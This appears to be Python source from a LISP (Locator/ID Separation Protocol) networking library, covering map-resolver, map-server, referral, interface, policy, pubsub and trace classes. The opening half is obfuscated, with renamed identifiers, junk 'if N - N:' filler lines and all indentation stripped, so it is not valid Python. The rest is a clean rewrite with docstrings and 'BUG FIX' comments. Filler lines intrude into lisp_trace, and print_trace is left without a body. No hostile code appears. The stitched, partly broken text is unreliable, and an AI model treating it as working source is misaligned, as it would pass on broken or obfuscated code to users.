if 36 - 36: oO0o + Oo0Ooo * I1Ii111 % OOooOOo . Oo0Ooo . I1IiiI
if 81 - 81: o0oOOo0O0Ooo . OoOoOO00 . i11iIiiIii
if 13 - 13: i1IIi
if ( len ( i1I1Ii11II1i . rle_nodes ) == 0 ) : i1I1Ii11II1i = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = i1I1Ii11II1i
if ( IiIi1I1i1iII ) : self . registered_rlocs [ 0 ] . rloc_name = None
if 70 - 70: O0 / II111iiii
if 98 - 98: OoOoOO00 - O0 . O0 + ooOoO0o * iIii1I11I1II1
if 7 - 7: IiII * OoOoOO00 + iIii1I11I1II1 / OoOoOO00 + Oo0Ooo / o0oOOo0O0Ooo
if 77 - 77: i1IIi . I1IiiI
if 59 - 59: O0 + OoooooooOO - i1IIi
if ( II1iI . keys ( ) == iiIIi . keys ( ) ) : return ( False )
if 87 - 87: IiII * OoooooooOO / Oo0Ooo % iIii1I11I1II1 % oO0o
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
# iII111i * O0 * II111iiii / i11iIiiIii * O0 + I1Ii111
II1iI . keys ( ) , iiIIi . keys ( ) ) )
if 42 - 42: iIii1I11I1II1
return ( True )
if 35 - 35: I1ii11iIi11i / OoOoOO00 / i1IIi / i11iIiiIii * iIii1I11I1II1 / i1IIi
if 69 - 69: OOooOOo / I1Ii111 * II111iiii
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
o00Ii = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( o00Ii == None ) :
o00Ii = lisp_site_eid ( self . site )
o00Ii . eid . copy_address ( self . group )
o00Ii . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , o00Ii )
if 88 - 88: OOooOOo - I1IiiI + Oo0Ooo
if 15 - 15: I11i / I1ii11iIi11i - I1Ii111 * O0 % ooOoO0o / I1IiiI
if 53 - 53: i11iIiiIii * i11iIiiIii % O0 % IiII
if 57 - 57: I1IiiI % i1IIi * OoO0O00 + I1Ii111 . I11i % I11i
if 69 - 69: I1ii11iIi11i / OoOoOO00 + iIii1I11I1II1
o00Ii . parent_for_more_specifics = self . parent_for_more_specifics
if 8 - 8: OoooooooOO
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( o00Ii . group )
o00Ii . add_source_entry ( self )
if 72 - 72: OoooooooOO % I1ii11iIi11i - OoO0O00 . OoooooooOO
if 83 - 83: o0oOOo0O0Ooo * Ii1I - Oo0Ooo * iII111i - i11iIiiIii
if 6 - 6: I1IiiI + i11iIiiIii + O0 / i1IIi
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
o00Ii = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( o00Ii == None ) : return
if 50 - 50: iII111i . II111iiii % I1Ii111 % I1IiiI / o0oOOo0O0Ooo . I1IiiI
oO00Oooo0o0o0 = o00Ii . lookup_source_cache ( self . eid , True )
if ( oO00Oooo0o0o0 == None ) : return
if 76 - 76: OOooOOo % iII111i
if ( o00Ii . source_cache == None ) : return
if 80 - 80: iIii1I11I1II1 + o0oOOo0O0Ooo + iIii1I11I1II1
o00Ii . source_cache . delete_cache ( self . eid )
if ( o00Ii . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
if 63 - 63: OoOoOO00 - o0oOOo0O0Ooo % II111iiii - Ii1I
if 81 - 81: iII111i % OOooOOo * oO0o
if 84 - 84: iII111i - OoooooooOO + I1ii11iIi11i - I1IiiI
if 52 - 52: oO0o / ooOoO0o / iII111i / OoOoOO00 * iIii1I11I1II1
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
if 74 - 74: oO0o . I1ii11iIi11i - iIii1I11I1II1
if 73 - 73: OoO0O00 / O0 . o0oOOo0O0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 100 - 100: Ii1I . OoO0O00 % I1ii11iIi11i % O0 * Oo0Ooo - OoOoOO00
if 15 - 15: OOooOOo - OOooOOo - OoooooooOO * OoO0O00
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 12 - 12: II111iiii * I1Ii111 / I1Ii111 * oO0o * Oo0Ooo
if 17 - 17: OoOoOO00 % I1Ii111 / iII111i * I1Ii111
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
if 96 - 96: Oo0Ooo % o0oOOo0O0Ooo . OoOoOO00 % i11iIiiIii / OoooooooOO
if 87 - 87: OoooooooOO - Ii1I . I11i / I1Ii111 . i1IIi
def inherit_from_ams_parent ( self ) :
i1II1 = self . parent_for_more_specifics
if ( i1II1 == None ) : return
self . force_proxy_reply = i1II1 . force_proxy_reply
self . force_nat_proxy_reply = i1II1 . force_nat_proxy_reply
self . force_ttl = i1II1 . force_ttl
self . pitr_proxy_reply_drop = i1II1 . pitr_proxy_reply_drop
self . proxy_reply_action = i1II1 . proxy_reply_action
self . echo_nonce_capable = i1II1 . echo_nonce_capable
self . policy = i1II1 . policy
self . require_signature = i1II1 . require_signature
if 86 - 86: i1IIi . oO0o % OOooOOo
if 99 - 99: oO0o / I1Ii111 * oO0o * I11i
def rtrs_in_rloc_set ( self ) :
for iIII in self . registered_rlocs :
if ( iIII . is_rtr ( ) ) : return ( True )
if 38 - 38: o0oOOo0O0Ooo + OoOoOO00
return ( False )
if 24 - 24: Ii1I - OOooOOo - o0oOOo0O0Ooo - I1Ii111 / OoooooooOO
if 17 - 17: OoO0O00
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for iIII in self . registered_rlocs :
if ( iIII . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( iIII . is_rtr ( ) ) : return ( True )
if 79 - 79: Ii1I - II111iiii
return ( False )
if 57 - 57: II111iiii / OoooooooOO
if 4 - 4: I11i * OoOoOO00
def is_rloc_in_rloc_set ( self , rloc ) :
for iIII in self . registered_rlocs :
if ( iIII . rle ) :
for i1I1Ii11II1i in iIII . rle . rle_nodes :
if ( i1I1Ii11II1i . address . is_exact_match ( rloc ) ) : return ( True )
if 18 - 18: iIii1I11I1II1 % OOooOOo - I1ii11iIi11i * i1IIi + Oo0Ooo
if 87 - 87: oO0o . I11i
if ( iIII . rloc . is_exact_match ( rloc ) ) : return ( True )
if 15 - 15: oO0o
return ( False )
if 45 - 45: Oo0Ooo * IiII * OoO0O00 + iIii1I11I1II1
if 89 - 89: IiII . IiII . oO0o % iII111i
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
if 27 - 27: OoOoOO00 + O0 % i1IIi - Oo0Ooo
for iIII in prev_rloc_set :
o00Oo00o0oO0 = iIII . rloc
if ( self . is_rloc_in_rloc_set ( o00Oo00o0oO0 ) == False ) : return ( False )
if 96 - 96: O0 % o0oOOo0O0Ooo + OOooOOo % I1IiiI
return ( True )
if 51 - 51: i1IIi . o0oOOo0O0Ooo % I1IiiI - OoooooooOO / OoOoOO00 - I11i
if 45 - 45: O0 * II111iiii / i11iIiiIii
if 38 - 38: OoooooooOO % i11iIiiIii - O0 / O0
class lisp_mr():
    """A configured map-resolver.  Instances live in the global
    lisp_map_resolvers_list, keyed by mr-name plus address.  A map-resolver
    may be configured by literal address or by DNS name; DNS names are
    re-resolved periodically and one lisp_mr is kept per A record."""

    def __init__(self, addr_str, dns_name, mr_name):
        self.mr_name = mr_name if (mr_name != None) else "all"
        self.dns_name = dns_name
        self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        self.a_record_index = 0
        if (addr_str):
            self.map_resolver.store_address(addr_str)
            self.insert_mr()
        else:
            self.resolve_dns_name()

        # Run-time statistics.
        self.last_used = 0
        self.last_reply = 0
        self.last_nonce = 0
        self.map_requests_sent = 0
        self.neg_map_replies_received = 0
        self.total_rtt = 0

    def resolve_dns_name(self):
        """Resolve self.dns_name and keep the map-resolver address in sync
        with the A records returned.  Throttled to once every 30 seconds.
        For LISP-Decent DNS suffixes, the first instance also creates one
        lisp_mr per additional A record and prunes stale ones."""
        if (self.dns_name == None): return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30): return

        try:
            lookup = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = lookup[2]
        except:
            return

        # Fewer A records than our index: this instance is now stale.
        if (len(a_records) <= self.a_record_index):
            self.delete_mr()
            return

        # Re-insert under the new address when our A record changed.
        addr_str = a_records[self.a_record_index]
        if (addr_str != self.map_resolver.print_address_no_iid()):
            self.delete_mr()
            self.map_resolver.store_address(addr_str)
            self.insert_mr()

        # The remainder applies only to the first (index 0) instance of a
        # LISP-Decent DNS name: fan out one lisp_mr per extra A record.
        if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
        if (self.a_record_index != 0): return

        for addr_str in a_records[1::]:
            address = lisp_address(LISP_AFI_NONE, addr_str, 0, 0)
            mr = lisp_get_map_resolver(address, None)
            if (mr != None and
                mr.a_record_index == a_records.index(addr_str)): continue

            mr = lisp_mr(addr_str, None, None)
            mr.a_record_index = a_records.index(addr_str)
            mr.dns_name = self.dns_name
            mr.last_dns_resolve = lisp_get_timestamp()

        # Prune map-resolvers for this DNS name whose address disappeared.
        stale = []
        for mr in lisp_map_resolvers_list.values():
            if (self.dns_name != mr.dns_name): continue
            addr_str = mr.map_resolver.print_address_no_iid()
            if (addr_str in a_records): continue
            stale.append(mr)

        for mr in stale: mr.delete_mr()

    def insert_mr(self):
        """Register this instance in the global map-resolver list."""
        key = self.mr_name + self.map_resolver.print_address()
        lisp_map_resolvers_list[key] = self

    def delete_mr(self):
        """Remove this instance from the global map-resolver list, if present."""
        key = self.mr_name + self.map_resolver.print_address()
        if (key not in lisp_map_resolvers_list): return
        lisp_map_resolvers_list.pop(key)
if 38 - 38: I1IiiI % I1ii11iIi11i * I1IiiI + OOooOOo - OoOoOO00
if 78 - 78: OOooOOo + I1Ii111
if 41 - 41: I11i + Oo0Ooo . Oo0Ooo / iII111i . OoOoOO00
class lisp_ddt_root():
    """A configured DDT root node: its address, authentication public key,
    and priority/weight for selection among multiple roots."""

    def __init__(self):
        self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.priority = 0
        self.weight = 0
if 1 - 1: ooOoO0o + iII111i % i11iIiiIii / OoOoOO00
if 98 - 98: IiII
if 75 - 75: OoooooooOO % IiII + Ii1I - i1IIi / OoooooooOO
class lisp_referral():
    """A LISP-DDT referral cache entry for an (EID, group) tuple, holding
    the referral node set, the referral action type, its TTL and expiry,
    plus an optional per-source cache for (S,G) entries."""

    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.referral_set = {}
        self.referral_type = LISP_DDT_ACTION_NULL
        self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.referral_ttl = 0
        self.uptime = lisp_get_timestamp()
        self.expires = 0
        self.source_cache = None

    def print_referral(self, eid_indent, referral_indent):
        """Log this referral entry and each node in its referral set,
        using the supplied indentation prefixes."""
        uptime = lisp_print_elapsed(self.uptime)
        expires = lisp_print_future(self.expires)
        lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:".format(
            eid_indent, green(self.eid.print_prefix(), False), uptime,
            expires, len(self.referral_set)))

        for ref_node in self.referral_set.values():
            ref_node.print_ref_node(referral_indent)

    def print_referral_type(self):
        """Return a human-readable name for this entry's referral action."""
        if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return ("root")
        if (self.referral_type == LISP_DDT_ACTION_NULL):
            return ("null-referral")
        if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
            return ("no-site-action")
        if (self.referral_type > LISP_DDT_ACTION_MAX):
            return ("invalid-action")
        return (lisp_map_referral_action_string[self.referral_type])

    def print_eid_tuple(self):
        """Return the printable (EID, group) tuple for this entry."""
        return (lisp_print_eid_tuple(self.eid, self.group))

    def print_ttl(self):
        """Render referral_ttl (an integer number of seconds) as
        '<n> secs' or, for whole minutes >= 1, '<n> mins'."""
        ttl = self.referral_ttl
        if (ttl < 60): return (str(ttl) + " secs")

        if ((ttl % 60) == 0):
            # BUG FIX: use integer division; with true division whole
            # minutes would render as e.g. '2.0 mins' on Python 3.
            ttl = str(ttl // 60) + " mins"
        else:
            ttl = str(ttl) + " secs"
        return (ttl)

    def is_referral_negative(self):
        """True when the referral action denotes a negative answer
        (not registered, delegation hole, or not authoritative)."""
        return (self.referral_type in (LISP_DDT_ACTION_MS_NOT_REG,
            LISP_DDT_ACTION_DELEGATION_HOLE, LISP_DDT_ACTION_NOT_AUTH))

    def add_cache(self):
        """Insert this entry into the global referral cache.  Unicast
        entries are cached by EID; (S,G) entries go into a per-group
        parent entry's source cache, creating the parent if needed."""
        if (self.group.is_null()):
            lisp_referral_cache.add_cache(self.eid, self)
        else:
            group_entry = lisp_referral_cache.lookup_cache(self.group, True)
            if (group_entry == None):
                group_entry = lisp_referral()
                group_entry.eid.copy_address(self.group)
                group_entry.group.copy_address(self.group)
                lisp_referral_cache.add_cache(self.group, group_entry)

            # Null source means (*, G): store as default route under group.
            if (self.eid.is_null()): self.eid.make_default_route(group_entry.group)
            group_entry.add_source_entry(self)

    def delete_cache(self):
        """Remove this entry from the global referral cache; for (S,G)
        entries also remove the per-group parent once its source cache
        becomes empty."""
        if (self.group.is_null()):
            lisp_referral_cache.delete_cache(self.eid)
        else:
            group_entry = lisp_referral_cache.lookup_cache(self.group, True)
            if (group_entry == None): return

            source_entry = group_entry.lookup_source_cache(self.eid, True)
            if (source_entry == None): return

            group_entry.source_cache.delete_cache(self.eid)
            if (group_entry.source_cache.cache_size() == 0):
                lisp_referral_cache.delete_cache(self.group)

    def add_source_entry(self, source_ref):
        """Add source_ref to the per-source cache, creating it lazily."""
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ref.eid, source_ref)

    def lookup_source_cache(self, source, exact):
        """Look up 'source' in the per-source cache; None when absent."""
        if (self.source_cache == None): return (None)
        return (self.source_cache.lookup_cache(source, exact))
if 11 - 11: OOooOOo
if 25 - 25: i1IIi
if 99 - 99: OOooOOo + OoooooooOO . I1Ii111 * Oo0Ooo % oO0o
class lisp_referral_node():
    """One node inside a referral set: its address, selection
    priority/weight, up/down status and simple counters."""

    def __init__(self):
        self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.priority = 0
        self.weight = 0
        self.updown = True
        self.map_requests_sent = 0
        self.no_responses = 0
        self.uptime = lisp_get_timestamp()

    def print_ref_node(self, indent):
        """Log one line describing this referral node."""
        uptime = lisp_print_elapsed(self.uptime)
        status = "up" if self.updown else "down"
        lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format(
            indent, red(self.referral_address.print_address(), False), uptime,
            status, self.priority, self.weight))
if 52 - 52: oO0o . ooOoO0o - I1Ii111 + OoooooooOO
if 86 - 86: I1ii11iIi11i - I1Ii111 + oO0o % II111iiii - i1IIi
if 32 - 32: I1Ii111 % ooOoO0o + I1Ii111 / I1ii11iIi11i - o0oOOo0O0Ooo + ooOoO0o
class lisp_ms():
    """A configured map-server peer.  Instances live in the global
    lisp_map_servers_list, keyed by ms-name plus address.  Like lisp_mr,
    a map-server may be configured by literal address or DNS name, with
    periodic re-resolution keeping one lisp_ms per A record."""

    def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
                 mr, rr, wmn, site_id, ekey_id, ekey):
        self.ms_name = ms_name if (ms_name != None) else "all"
        self.dns_name = dns_name
        self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        self.a_record_index = 0

        # All map-servers share a single xTR-ID; reuse the existing one
        # when any map-server is already configured.
        if (lisp_map_servers_list == {}):
            self.xtr_id = lisp_get_control_nonce()
        else:
            self.xtr_id = list(lisp_map_servers_list.values())[0].xtr_id

        self.alg_id = alg_id
        self.key_id = key_id
        self.password = pw
        self.proxy_reply = pr
        self.merge_registrations = mr
        self.refresh_registrations = rr
        self.want_map_notify = wmn
        self.site_id = site_id
        self.map_registers_sent = 0
        self.map_registers_multicast_sent = 0
        self.map_notifies_received = 0
        self.map_notify_acks_sent = 0
        self.ekey_id = ekey_id
        self.ekey = ekey
        if (addr_str):
            self.map_server.store_address(addr_str)
            self.insert_ms()
        else:
            self.resolve_dns_name()

    def resolve_dns_name(self):
        """Resolve self.dns_name and keep the map-server address in sync
        with the returned A records.  Throttled to once every 30 seconds.
        For LISP-Decent DNS suffixes, the first instance clones itself for
        each additional A record and prunes stale instances."""
        if (self.dns_name == None): return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30): return

        try:
            lookup = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = lookup[2]
        except:
            return

        # Fewer A records than our index: this instance is now stale.
        if (len(a_records) <= self.a_record_index):
            self.delete_ms()
            return

        # Re-insert under the new address when our A record changed.
        addr_str = a_records[self.a_record_index]
        if (addr_str != self.map_server.print_address_no_iid()):
            self.delete_ms()
            self.map_server.store_address(addr_str)
            self.insert_ms()

        # Remainder applies only to the first instance of a LISP-Decent
        # DNS name: clone one lisp_ms per extra A record.
        if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
        if (self.a_record_index != 0): return

        for addr_str in a_records[1::]:
            address = lisp_address(LISP_AFI_NONE, addr_str, 0, 0)
            ms = lisp_get_map_server(address)
            if (ms != None and
                ms.a_record_index == a_records.index(addr_str)): continue

            ms = copy.deepcopy(self)
            ms.map_server.store_address(addr_str)
            ms.a_record_index = a_records.index(addr_str)
            ms.last_dns_resolve = lisp_get_timestamp()
            ms.insert_ms()

        # Prune map-servers for this DNS name whose address disappeared.
        stale = []
        for ms in lisp_map_servers_list.values():
            if (self.dns_name != ms.dns_name): continue
            addr_str = ms.map_server.print_address_no_iid()
            if (addr_str in a_records): continue
            stale.append(ms)

        for ms in stale: ms.delete_ms()

    def insert_ms(self):
        """Register this instance in the global map-server list."""
        key = self.ms_name + self.map_server.print_address()
        lisp_map_servers_list[key] = self

    def delete_ms(self):
        """Remove this instance from the global map-server list, if present."""
        key = self.ms_name + self.map_server.print_address()
        if (key not in lisp_map_servers_list): return
        lisp_map_servers_list.pop(key)
if 93 - 93: OOooOOo
if 82 - 82: iIii1I11I1II1 + OoO0O00 / iIii1I11I1II1 . iIii1I11I1II1
if 36 - 36: iII111i % I1ii11iIi11i + OoOoOO00 - i11iIiiIii % II111iiii % I11i
class lisp_interface():
    """A LISP interface: wraps a network device name with its instance-id,
    dynamic-EID configuration, and the raw/bridge sockets used to send
    packets on that device."""

    def __init__(self, device):
        self.interface_name = ""
        self.device = device
        self.instance_id = None
        self.bridge_socket = None
        self.raw_socket = None
        self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.dynamic_eid_device = None
        self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
        self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)

    def add_interface(self):
        """Register this interface in the global lisp_myinterfaces table,
        keyed by device name."""
        lisp_myinterfaces[self.device] = self

    def get_instance_id(self):
        """Return the interface's configured instance-id (None if unset)."""
        return (self.instance_id)

    def get_socket(self):
        """Return the raw IPv4 socket bound to this device, or None."""
        return (self.raw_socket)

    def get_bridge_socket(self):
        """Return the packet (bridge) socket bound to this device, or None."""
        return (self.bridge_socket)

    def does_dynamic_eid_match(self, eid):
        """True when 'eid' falls within this interface's configured
        dynamic-EID prefix; False when no dynamic-EID is configured."""
        if (self.dynamic_eid.is_null()): return (False)
        return (eid.is_more_specific(self.dynamic_eid))

    def set_socket(self, device):
        """Open a raw IPv4 socket bound to 'device' and store it in
        self.raw_socket (None when the bind fails)."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW,
            socket.IPPROTO_RAW)
        sock.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
        try:
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
        except:
            sock.close()
            sock = None
        self.raw_socket = sock

    def set_bridge_socket(self, device):
        """Open a PF_PACKET socket bound to 'device' and store it in
        self.bridge_socket; leaves it unset when the bind fails."""
        sock = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
        try:
            # BUG FIX: socket.bind() returns None; the original assigned
            # its return value back to the socket variable, so
            # self.bridge_socket was always set to None.  Bind in place
            # and keep the socket object.
            sock.bind((device, 0))
            self.bridge_socket = sock
        except:
            return
if 61 - 61: iII111i * Ii1I % Ii1I + I1IiiI
if 23 - 23: oO0o + I1Ii111 / OoooooooOO / O0 + IiII
if 80 - 80: i11iIiiIii - OoooooooOO + II111iiii / i1IIi - oO0o
if 100 - 100: Ii1I
class lisp_datetime():
    """Wraps a timestamp string in 'YYYY-MM-DD-HH:MM:SS' form and stores
    it also as a comparable integer (YYYYMMDDHHMMSS) for range tests."""

    def __init__(self, datetime_str):
        self.datetime_name = datetime_str
        self.datetime = None
        self.parse_datetime()

    def valid_datetime(self):
        """Validate that datetime_name is a well-formed
        'YYYY-MM-DD-HH:MM:SS' string with each field in range.

        BUG FIX: the original range checks used 'and' (e.g.
        month < "01" and month > "12"), a condition that can never be
        true, so out-of-range values were silently accepted.  The checks
        now use 'or' as intended."""
        ts = self.datetime_name
        if (ts.find(":") == -1): return (False)
        if (ts.find("-") == -1): return (False)
        year, month, day, time_str = ts[0:4], ts[5:7], ts[8:10], ts[11::]

        if ((year + month + day).isdigit() == False): return (False)
        if (month < "01" or month > "12"): return (False)
        if (day < "01" or day > "31"): return (False)

        hour, minute, second = time_str.split(":")

        if ((hour + minute + second).isdigit() == False): return (False)
        if (hour < "00" or hour > "23"): return (False)
        if (minute < "00" or minute > "59"): return (False)
        if (second < "00" or second > "59"): return (False)
        return (True)

    def parse_datetime(self):
        """Strip separators and store the timestamp as an integer."""
        digits = self.datetime_name
        digits = digits.replace("-", "")
        digits = digits.replace(":", "")
        self.datetime = int(digits)

    def now(self):
        """Return a lisp_datetime for the current local time."""
        ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
        return (lisp_datetime(ts))

    def print_datetime(self):
        """Return the original timestamp string."""
        return (self.datetime_name)

    def future(self):
        """True when this timestamp is later than the current time."""
        return (self.datetime > self.now().datetime)

    def past(self):
        """True when this timestamp is not in the future."""
        return (self.future() == False)

    def now_in_range(self, upper):
        """True when the current time lies between this timestamp and
        'upper'."""
        return (self.past() and upper.future())

    def this_year(self):
        """True when this timestamp falls in the current year."""
        current = str(self.now().datetime)[0:4]
        mine = str(self.datetime)[0:4]
        return (mine == current)

    def this_month(self):
        """True when this timestamp falls in the current month."""
        current = str(self.now().datetime)[0:6]
        mine = str(self.datetime)[0:6]
        return (mine == current)

    def today(self):
        """True when this timestamp falls on the current day."""
        current = str(self.now().datetime)[0:8]
        mine = str(self.datetime)[0:8]
        return (mine == current)
if 77 - 77: I1IiiI
if 16 - 16: I1IiiI + ooOoO0o - O0 / o0oOOo0O0Ooo
if 36 - 36: Oo0Ooo - OoOoOO00 - II111iiii
if 25 - 25: i11iIiiIii + II111iiii * OOooOOo % OOooOOo
if 87 - 87: I11i % Ii1I % Oo0Ooo . II111iiii / oO0o
if 19 - 19: O0 . OOooOOo + I1Ii111 * I1ii11iIi11i
class lisp_policy_match():
    """One 'match' clause of a LISP policy.  Every criterion defaults to
    None, which means the criterion is unset and matches anything."""

    def __init__(self):
        for criterion in ("source_eid", "dest_eid", "source_rloc",
                          "dest_rloc", "rloc_record_name", "geo_name",
                          "elp_name", "rle_name", "json_name",
                          "datetime_lower", "datetime_upper"):
            setattr(self, criterion, None)
if 91 - 91: o0oOOo0O0Ooo / oO0o . o0oOOo0O0Ooo + IiII + ooOoO0o . I1Ii111
if 90 - 90: i1IIi + oO0o * oO0o / ooOoO0o . IiII
class lisp_policy():
    """A configured 'lisp policy': a list of match clauses plus the
    set-* overrides applied to Map-Replies when a clause matches.
    """

    def __init__(self, policy_name):
        self.policy_name = policy_name
        self.match_clauses = []
        self.set_action = None
        self.set_record_ttl = None
        self.set_source_eid = None
        self.set_dest_eid = None
        self.set_rloc_address = None
        self.set_rloc_record_name = None
        self.set_geo_name = None
        self.set_elp_name = None
        self.set_rle_name = None
        self.set_json_name = None

    def match_policy_map_request(self, mr, srloc):
        """Return True when Map-Request 'mr' (arriving from source RLOC
        'srloc') matches any of this policy's match clauses.

        A clause criterion that is None is a wildcard; a configured
        criterion must be matched (via is_more_specific() for prefixes,
        now_in_range() for the datetime window) or the clause is skipped.
        """
        for clause in self.match_clauses:
            prefix = clause.source_eid
            value = mr.source_eid
            if (prefix and value and value.is_more_specific(prefix) == False):
                continue

            prefix = clause.dest_eid
            value = mr.target_eid
            if (prefix and value and value.is_more_specific(prefix) == False):
                continue

            prefix = clause.source_rloc
            value = srloc
            if (prefix and value and value.is_more_specific(prefix) == False):
                continue

            lower = clause.datetime_lower
            upper = clause.datetime_upper
            if (lower and upper and lower.now_in_range(upper) == False):
                continue
            return(True)
        return(False)

    def set_policy_map_reply(self):
        """Build a lisp_rloc carrying this policy's set-* overrides.

        Returns None when no RLOC-affecting override is configured.
        Note: set_json_name alone does not trigger building an RLOC
        (preserved from the original decision logic).
        """
        all_unset = (self.set_rloc_address == None and
            self.set_rloc_record_name == None and self.set_geo_name == None and
            self.set_elp_name == None and self.set_rle_name == None)
        if (all_unset): return(None)

        rloc = lisp_rloc()
        if (self.set_rloc_address):
            rloc.rloc.copy_address(self.set_rloc_address)
            address = rloc.rloc.print_address_no_iid()
            lprint("Policy set-rloc-address to {}".format(address))

        if (self.set_rloc_record_name):
            rloc.rloc_name = self.set_rloc_record_name
            name = blue(rloc.rloc_name, False)
            lprint("Policy set-rloc-record-name to {}".format(name))

        # dict.has_key() was removed in Python 3; the "in" operator is
        # equivalent and works in Python 2 as well.
        if (self.set_geo_name):
            rloc.geo_name = self.set_geo_name
            name = rloc.geo_name
            configured = "" if name in lisp_geo_list else "(not configured)"
            lprint("Policy set-geo-name '{}' {}".format(name, configured))

        if (self.set_elp_name):
            rloc.elp_name = self.set_elp_name
            name = rloc.elp_name
            configured = "" if name in lisp_elp_list else "(not configured)"
            lprint("Policy set-elp-name '{}' {}".format(name, configured))

        if (self.set_rle_name):
            rloc.rle_name = self.set_rle_name
            name = rloc.rle_name
            configured = "" if name in lisp_rle_list else "(not configured)"
            lprint("Policy set-rle-name '{}' {}".format(name, configured))

        if (self.set_json_name):
            rloc.json_name = self.set_json_name
            name = rloc.json_name
            configured = "" if name in lisp_json_list else "(not configured)"
            lprint("Policy set-json-name '{}' {}".format(name, configured))
        return(rloc)

    def save_policy(self):
        """Register this policy in the global lisp_policies table."""
        lisp_policies[self.policy_name] = self
class lisp_pubsub():
    """Subscription state for one ITR that requested Map-Notifies for an
    EID-prefix. Entries are stored in the global lisp_pubsub_cache,
    keyed first by printed EID-prefix and then by xtr-id.
    """

    def __init__(self, itr, port, nonce, ttl, xtr_id):
        self.itr = itr          # subscriber's address
        self.port = port        # subscriber's UDP port
        self.nonce = nonce      # nonce from the subscribing Map-Request
        self.uptime = lisp_get_timestamp()
        self.ttl = ttl
        self.xtr_id = xtr_id    # distinguishes xTRs behind one RLOC
        self.map_notify_count = 0

    def add(self, eid_prefix):
        """Add (or replace) this subscription under 'eid_prefix'."""
        ttl = self.ttl
        prefix = eid_prefix.print_prefix()
        # dict.has_key() was removed in Python 3; use "in" (works in
        # Python 2 too).
        if (prefix not in lisp_pubsub_cache):
            lisp_pubsub_cache[prefix] = {}
        pubsub = lisp_pubsub_cache[prefix]

        action = "Add"
        if (self.xtr_id in pubsub):
            action = "Replace"
            del(pubsub[self.xtr_id])
        pubsub[self.xtr_id] = self

        prefix = green(prefix, False)
        itr = red(self.itr.print_address_no_iid(), False)
        xtr_id = "0x" + lisp_hex_string(self.xtr_id)
        lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(action,
            prefix, itr, xtr_id, ttl))

    def delete(self, eid_prefix):
        """Remove this xtr-id's subscription for 'eid_prefix', if any."""
        prefix = eid_prefix.print_prefix()
        itr = red(self.itr.print_address_no_iid(), False)
        xtr_id = "0x" + lisp_hex_string(self.xtr_id)
        if (prefix in lisp_pubsub_cache):
            pubsub = lisp_pubsub_cache[prefix]
            if (self.xtr_id in pubsub):
                pubsub.pop(self.xtr_id)
                lprint("Remove pubsub state {} for {}, xtr-id: {}".format(
                    prefix, itr, xtr_id))
class lisp_trace():
    """A LISP-Trace message: a 64-bit nonce plus a JSON array of hop
    records. Encoded/decoded with Python 2 'str' byte-string semantics.
    """

    def __init__(self):
        self.nonce = lisp_get_control_nonce()  # 64-bit message identifier
        self.packet_json = []    # list of per-hop records, carried as JSON
        self.local_rloc = None   # dotted-quad string parsed from header
        self.local_port = None   # port (string) parsed from header
        self.lisp_socket = None
        if 74 - 74: O0 . i1IIi / I1ii11iIi11i + o0oOOo0O0Ooo
        if 24 - 24: ooOoO0o % I1Ii111 + OoO0O00 * o0oOOo0O0Ooo % O0 - i11iIiiIii

    def print_trace(self):
